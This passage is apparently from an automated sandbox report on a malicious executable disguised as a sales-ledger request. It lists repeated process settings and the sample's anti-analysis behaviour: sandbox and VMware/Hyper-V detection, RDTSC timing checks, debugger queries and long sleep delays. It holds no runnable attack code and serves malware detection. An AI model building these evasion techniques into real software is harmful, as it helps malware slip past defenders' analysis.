                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLDSELECT * FROM WIN32_COMPUTERSYSTEM
                  Tries to detect virtualization through RDTSC time measurementsShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                  Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000002B198E4 second address: 0000000002B198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                  Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000002B19B5E second address: 0000000002B19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00409A90 rdtsc 24_2_00409A90
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4734Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2204Jump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe TID: 5512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320Thread sleep count: 4734 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320Thread sleep count: 2204 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep count: 51 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000016.00000003.399487030.000000000599A000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                  Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                  Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
                  Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: explorer.exe, 00000019.00000000.347525561.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: explorer.exe, 00000019.00000000.335019320.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
                  Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
                  Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                  Source: explorer.exe, 00000019.00000000.348546302.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
                  Source: explorer.exe, 00000019.00000000.335150903.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                  Source: explorer.exe, 00000019.00000000.349143933.00000000088C3000.00000004.00000001.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: AdvancedRun.exe, 00000009.00000002.283016558.0000000000757000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: powershell.exe, 00000016.00000003.399487030.000000000599A000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                  Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeProcess queried: DebugPort
                  Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00409A90 rdtsc 24_2_00409A90
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0040ACD0 LdrLoadDll,24_2_0040ACD0
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_0040289F
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01214120 mov eax, dword ptr fs:[00000030h]24_2_01214120
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01214120 mov eax, dword ptr fs:[00000030h]24_2_01214120
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01214120 mov eax, dword ptr fs:[00000030h]24_2_01214120
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01214120 mov eax, dword ptr fs:[00000030h]24_2_01214120
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01214120 mov ecx, dword ptr fs:[00000030h]24_2_01214120
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122513A mov eax, dword ptr fs:[00000030h]24_2_0122513A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122513A mov eax, dword ptr fs:[00000030h]24_2_0122513A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9100 mov eax, dword ptr fs:[00000030h]24_2_011F9100
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9100 mov eax, dword ptr fs:[00000030h]24_2_011F9100
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9100 mov eax, dword ptr fs:[00000030h]24_2_011F9100
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121B944 mov eax, dword ptr fs:[00000030h]24_2_0121B944
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121B944 mov eax, dword ptr fs:[00000030h]24_2_0121B944
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FB171 mov eax, dword ptr fs:[00000030h]24_2_011FB171
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FB171 mov eax, dword ptr fs:[00000030h]24_2_011FB171
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FC962 mov eax, dword ptr fs:[00000030h]24_2_011FC962
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012769A6 mov eax, dword ptr fs:[00000030h]24_2_012769A6
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012261A0 mov eax, dword ptr fs:[00000030h]24_2_012261A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012261A0 mov eax, dword ptr fs:[00000030h]24_2_012261A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h]24_2_012B49A4
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h]24_2_012B49A4
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h]24_2_012B49A4
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h]24_2_012B49A4
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012751BE mov eax, dword ptr fs:[00000030h]24_2_012751BE
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012751BE mov eax, dword ptr fs:[00000030h]24_2_012751BE
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012751BE mov eax, dword ptr fs:[00000030h]24_2_012751BE
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012751BE mov eax, dword ptr fs:[00000030h]24_2_012751BE
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121C182 mov eax, dword ptr fs:[00000030h]24_2_0121C182
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122A185 mov eax, dword ptr fs:[00000030h]24_2_0122A185
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222990 mov eax, dword ptr fs:[00000030h]24_2_01222990
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012841E8 mov eax, dword ptr fs:[00000030h]24_2_012841E8
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h]24_2_011FB1E1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h]24_2_011FB1E1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h]24_2_011FB1E1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h]24_2_0120B02A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h]24_2_0120B02A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h]24_2_0120B02A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h]24_2_0120B02A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122002D mov eax, dword ptr fs:[00000030h]24_2_0122002D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122002D mov eax, dword ptr fs:[00000030h]24_2_0122002D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122002D mov eax, dword ptr fs:[00000030h]24_2_0122002D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122002D mov eax, dword ptr fs:[00000030h]24_2_0122002D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122002D mov eax, dword ptr fs:[00000030h]24_2_0122002D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01277016 mov eax, dword ptr fs:[00000030h]24_2_01277016
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01277016 mov eax, dword ptr fs:[00000030h]24_2_01277016
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01277016 mov eax, dword ptr fs:[00000030h]24_2_01277016
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C4015 mov eax, dword ptr fs:[00000030h]24_2_012C4015
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C4015 mov eax, dword ptr fs:[00000030h]24_2_012C4015
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B2073 mov eax, dword ptr fs:[00000030h]24_2_012B2073
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C1074 mov eax, dword ptr fs:[00000030h]24_2_012C1074
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01210050 mov eax, dword ptr fs:[00000030h]24_2_01210050
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01210050 mov eax, dword ptr fs:[00000030h]24_2_01210050
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]24_2_012220A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]24_2_012220A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]24_2_012220A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]24_2_012220A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]24_2_012220A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]24_2_012220A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012390AF mov eax, dword ptr fs:[00000030h]24_2_012390AF
